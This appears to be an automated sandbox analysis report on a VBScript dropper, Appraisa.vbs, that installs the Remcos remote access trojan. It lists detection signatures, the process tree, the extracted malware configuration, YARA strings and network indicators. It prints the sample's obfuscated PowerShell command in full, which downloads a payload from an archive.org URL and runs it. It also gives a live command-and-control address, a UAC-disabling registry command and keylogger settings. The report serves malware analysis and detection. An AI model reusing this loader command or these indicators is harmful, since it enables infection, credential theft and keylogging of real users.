Loading ...

Play interactive tourEdit tour

Analysis Report Appraisa.vbs

Overview

General Information

Sample Name:Appraisa.vbs
Analysis ID:394453
MD5:2e95d045ff86903502b52f5fd0976aad
SHA1:c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
SHA256:dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
Tags:RATRemcosRATvbs
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates an undocumented autostart registry key
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected MSILLoadEncryptedAssembly
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6572 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6632 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6868 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • aspnet_compiler.exe (PID: 6984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "194.5.97.183:8888:1", "Assigned name": "Host", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VMXRX", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\ Microsoft.ps1JoeSecurity_MSIL_Load_Encrypted_AssemblyYara detected MSIL_Load_Encrypted_AssemblyJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpJoeSecurity_MSIL_Load_Encrypted_AssemblyYara detected MSIL_Load_Encrypted_AssemblyJoe Security
      00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmpJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
            • 0x5f69c:$str_a1: C:\Windows\System32\cmd.exe
            • 0x5f618:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x5f618:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x5ec38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x5f290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x5e86c:$str_b2: Executing file:
            • 0x5f7e0:$str_b3: GetDirectListeningPort
            • 0x5f050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x5f3d4:$str_b5: licence_code.txt
            • 0x5f278:$str_b7: \update.vbs
            • 0x5e8dc:$str_b9: Downloaded file:
            • 0x5e8a8:$str_b10: Downloading file:
            • 0x5e890:$str_b12: Failed to upload file:
            • 0x5f7a8:$str_b13: StartForward
            • 0x5f7c8:$str_b14: StopForward
            • 0x5f220:$str_b15: fso.DeleteFile "
            • 0x5f1b4:$str_b16: On Error Resume Next
            • 0x5f250:$str_b17: fso.DeleteFolder "
            • 0x5e880:$str_b18: Uploaded file:
            • 0x5e91c:$str_b19: Unable to delete:
            • 0x5f1e8:$str_b20: while fso.FileExists("
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            16.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              16.2.aspnet_compiler.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x5f69c:$str_a1: C:\Windows\System32\cmd.exe
              • 0x5f618:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x5f618:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x5ec38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x5f290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x5e86c:$str_b2: Executing file:
              • 0x5f7e0:$str_b3: GetDirectListeningPort
              • 0x5f050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x5f3d4:$str_b5: licence_code.txt
              • 0x5f278:$str_b7: \update.vbs
              • 0x5e8dc:$str_b9: Downloaded file:
              • 0x5e8a8:$str_b10: Downloading file:
              • 0x5e890:$str_b12: Failed to upload file:
              • 0x5f7a8:$str_b13: StartForward
              • 0x5f7c8:$str_b14: StopForward
              • 0x5f220:$str_b15: fso.DeleteFile "
              • 0x5f1b4:$str_b16: On Error Resume Next
              • 0x5f250:$str_b17: fso.DeleteFolder "
              • 0x5e880:$str_b18: Uploaded file:
              • 0x5e91c:$str_b19: Unable to delete:
              • 0x5f1e8:$str_b20: while fso.FileExists("
              16.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                16.2.aspnet_compiler.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                • 0x5ea9c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x5ea18:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x5ea18:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x5e038:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x5e690:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x5dc6c:$str_b2: Executing file:
                • 0x5ebe0:$str_b3: GetDirectListeningPort
                • 0x5e450:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x5e7d4:$str_b5: licence_code.txt
                • 0x5e678:$str_b7: \update.vbs
                • 0x5dcdc:$str_b9: Downloaded file:
                • 0x5dca8:$str_b10: Downloading file:
                • 0x5dc90:$str_b12: Failed to upload file:
                • 0x5eba8:$str_b13: StartForward
                • 0x5ebc8:$str_b14: StopForward
                • 0x5e620:$str_b15: fso.DeleteFile "
                • 0x5e5b4:$str_b16: On Error Resume Next
                • 0x5e650:$str_b17: fso.DeleteFolder "
                • 0x5dc80:$str_b18: Uploaded file:
                • 0x5dd1c:$str_b19: Unable to delete:
                • 0x5e5e8:$str_b20: while fso.FileExists("

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: RemcosShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6984, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 16.2.aspnet_compiler.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": "194.5.97.183:8888:1", "Assigned name": "Host", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VMXRX", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042DD9C CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,
                Source: aspnet_compiler.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
                Source: unknownHTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.6:49716 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.228.140:443 -> 192.168.2.6:49722 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.227.121:443 -> 192.168.2.6:49727 version: TLS 1.0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00406176 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040A216 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004452E9 FindFirstFileExA,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040A431 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00407C57 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00414C1B FindFirstFileW,FindNextFileW,FindNextFileW,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00416F26 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

                Networking:

                barindex
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: 194.5.97.183
                Source: global trafficTCP traffic: 192.168.2.6:49734 -> 194.5.97.183:8888
                Source: Joe Sandbox ViewIP Address: 207.241.228.140 207.241.228.140
                Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: unknownHTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.6:49716 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.228.140:443 -> 192.168.2.6:49722 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.227.121:443 -> 192.168.2.6:49727 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.97.183
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041230D Sleep,URLDownloadToFileW,
                Source: unknownDNS traffic detected: queries for: ia601509.us.archive.org
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                Source: powershell.exe, 00000001.00000002.607374072.000001E84E9B0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                Source: powershell.exe, 0000000C.00000003.409245391.00000135614DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://ia601401.us.archive.org
                Source: powershell.exe, 00000001.00000002.604580136.000001E838036000.00000004.00000001.sdmpString found in binary or memory: http://ia801400.us.archive.org
                Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                Source: powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.596741320.000001E836671000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.604945687.000001E83814F000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: https://ia601401.us.archive.org
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmpString found in binary or memory: https://ia601401.us.archive.org/6/items/server_20210420_1438/Server.txt
                Source: powershell.exe, 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmpString found in binary or memory: https://ia601401.us.archive.orgx
                Source: powershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org
                Source: PowerShell_transcript.367706.fOfA42_i.20210421153634.txt.1.drString found in binary or memory: https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT
                Source: powershell.exe, 00000001.00000002.601177058.000001E837087000.00000004.00000001.sdmpString found in binary or memory: https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT0y
                Source: powershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmpString found in binary or memory: https://ia801400.us.arX
                Source: powershell.exe, 00000001.00000002.603008008.000001E837A68000.00000004.00000001.sdmpString found in binary or memory: https://ia801400.us.archive.org
                Source: powershell.exe, 00000001.00000002.602933114.000001E837A11000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.604545038.000001E838006000.00000004.00000001.sdmpString found in binary or memory: https://ia801400.us.archive.org/0/items/bat02/bat02.txt
                Source: powershell.exe, 00000001.00000002.606028992.000001E846817000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Installs a global keyboard hookShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00412575 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00412575 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004089BC GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

                E-Banking Fraud:

                barindex
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Wscript starts Powershell (via cmd or directly)Show sources
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00412468 ExitWindowsEx,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00422089
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004340BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0044C1EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041A272
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0045F218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0043034B
